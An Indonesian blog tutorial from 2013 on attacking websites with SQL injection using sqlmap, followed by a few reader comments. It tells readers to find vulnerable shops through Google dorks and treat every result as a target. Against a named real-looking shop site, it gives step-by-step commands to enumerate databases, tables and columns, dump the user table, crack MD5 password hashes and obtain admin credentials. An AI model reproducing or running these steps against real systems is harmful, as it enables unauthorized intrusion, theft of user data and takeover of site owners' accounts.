» » Tutorial SQL Injection dengan SQLMAP

Tutorial SQL Injection dengan SQLMAP

Assalamu’alaikum Wr. Wb.
Beberapa hari yang lalu berjam – jam ngetes web vuln SQL injection pake Havij gak ada yang bisa di scan meskipun pake havij yang versi terbaru. Akhirnya ya udah saya buat aja tutorialnya pakai tool sqlmap. SQLmap merupakan tool scanning SQL Injection berbasis python yang ada pada Linux. Tool ini dapat dijalankan di linux, tapi kalo di windows juga bisa dengan bantuan Active Python. Pertama kamu download Active Python dulu, linknya ada di bawah ini.
Untuk 86 bit dan 32 bit = http://www.activestate.com/activepython/downloads/thank-you?dl=http://downloads.activestate.com/ActivePython/releases/2.7.5.6/ActivePython-2.7.5.6-win32-x86.msi
Untuk yang 64 bit = http://www.activestate.com/activepython/downloads/thank-you?dl=http://downloads.activestate.com/ActivePython/releases/2.7.5.6/ActivePython-2.7.5.6-win64-x64.msi
Kalo udah di download, langsung di install aja.
Setelah di install, sekarang kita download tool sqlmap. Linknya dibawah ini
http://sourceforge.net/projects/sqlmap/files/sqlmap/0.9/sqlmap-0.9.tar.gz/download?use_mirror=nchc
Kalo udah di download, taruh file sqlmap di localdisk C:
Kalo udah di copy, extract filenya. Caranya klik kanan file sqlmap, kemudian klik extract here.
Tunggu prosesnya sampai selesai.

Nah udah selesai kan. Sekarang cari dork untuk SQL injection. Ada 6851 dork di perpustakaan ISC. Ini linknya: http://perpustakaan.indosecuritycyber.tk/hacking/6851dorkSQLi.txt
 
Contoh disini saya menggunakan dork inurl:product.php?c=
Cara pakainya buka www.google.co.id kemudian masukkan dorknya ke kotak pencarian.
Tuh keluar banyak banget webnya. Itu target semua. Sekarang kita cari target untuk di scan. Disini saya kasih contoh target http://www.vana-shop.com/product.php?c=1
 
Copy URL target ke address bar.
Setalah itu kasih tanda petik ‘ di belakang URL untuk memastikan vuln dan tidaknya. Kemudian tekan enter.
 Setelah loading selesai kalau ada tulisan “You have an error in your SQL syntax” dan seterusnya, brarti webnya vuln.
 Nah setelah tadi Active Python di install, sekarang PC kita bisa mengenali file .py. Sekarang kita buka Command Promt (CMD) kemudian jalankan sqlmap.
Caranya klik Start à All Programs atau Programs à Accessories à klik Command Promt.
 Tampilannya seperti dibawah ini.
Ketik perintah “cd..” tanpa tanda petik kemudian tekan enter seperti dibawah ini
Ketik perintah “cd..” kemudian tekan enter lagi seperti dibawah ini
Ketik perintah “cd sqlmap” kemudian tekan enter seperti dibawah ini
Sekarang ketik perintah “sqlmap.py -u URL_TARGET --dbs”
Contoh: sqlmap.py -u http://www.vana-shop.com/product.php?c=1 --dbs

Tunggu sampai proses selesai, kalo disuruh mengetik perintah, ketik “y” kemudian tekan enter (kadang).
Lihat gambar dibawah ini, databasenya udah ditemukan. Ada information_schema dan k4735093_vnsh099.
Masukkan perintah “sqlmap.py -u URL_TARGET -D NAMA_DATABASE --tables”
Contoh: sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables 
Nah lihat gambar dibawah ini, table (table) databasenya udah ditemukan. Kita cari yang berhubungan dengan user. Misal kita pakai yang user seperti dibawah ini.
Masukkan perintah “sqlmap.py -u URL_TARGET -D NAMA_DATABASE -T NAMA_TABLE --columns”
Contoh: sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns 
Tunggu sampai terlihat seperti di bawah ini.
Sekarang kita lihat isi datanya.
Masukkan perintah “sqlmap.py -u URL_TARGET -D NAMA_DATABASE -T NAMA_TABLE --dump”

Contoh: sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump


Jika passwordnya ada yang diencrypt / berbentuk md5, nanti ada notifikasinya seperti dibawah ini. Ketik “Y” kalo ingin di crack sekalian. Atau ketik “n” kalau ingin melewati proses cracking md5. Kemudian tekan enter.
Nah sekarang udah keliatan kan yang dicari. Ada username dan kata sandi / password untuk login admin.
Untuk mencari halaman login bisa menggunakan adminfinder, havij, acunetix, dll. Sekian dulu tutorialnya, semoga bermanfaat :)
Wassalamu’alaikum Wr. Wb.
Content by : Muhammad Fuad Fachrudin
Anda baru saja membaca artikel yang berkategori Web Hacking dengan judul Tutorial SQL Injection dengan SQLMAP. Jika kamu suka, jangan lupa like dan bagikan keteman-temanmu ya... By : Indonesia Security Cyber
Ditulis oleh: Muhammad Fuad Fachrudin - Monday, October 7, 2013

3 komentar untuk "Tutorial SQL Injection dengan SQLMAP"

  1. Onsom bloggerOctober 19, 2013 at 8:33 PM

    mas ,kok di CMD ane ada tulisan the system cannot path specisifed?

    ReplyDelete
  2. Muhammad Fuad FachrudinOctober 25, 2013 at 1:02 AM

    Gunakan perintah cd.. dan cd [nama.path] untuk masuk ke folder sqlmap sesuai yang di gambar

    ReplyDelete
  3. UnknownFebruary 11, 2015 at 12:20 AM

    Thanks Infonya Gan Jangan Lupa Visit Back http://www.stevin-germy.my.id

    ReplyDelete

Subscribe to: Post Comments (Atom)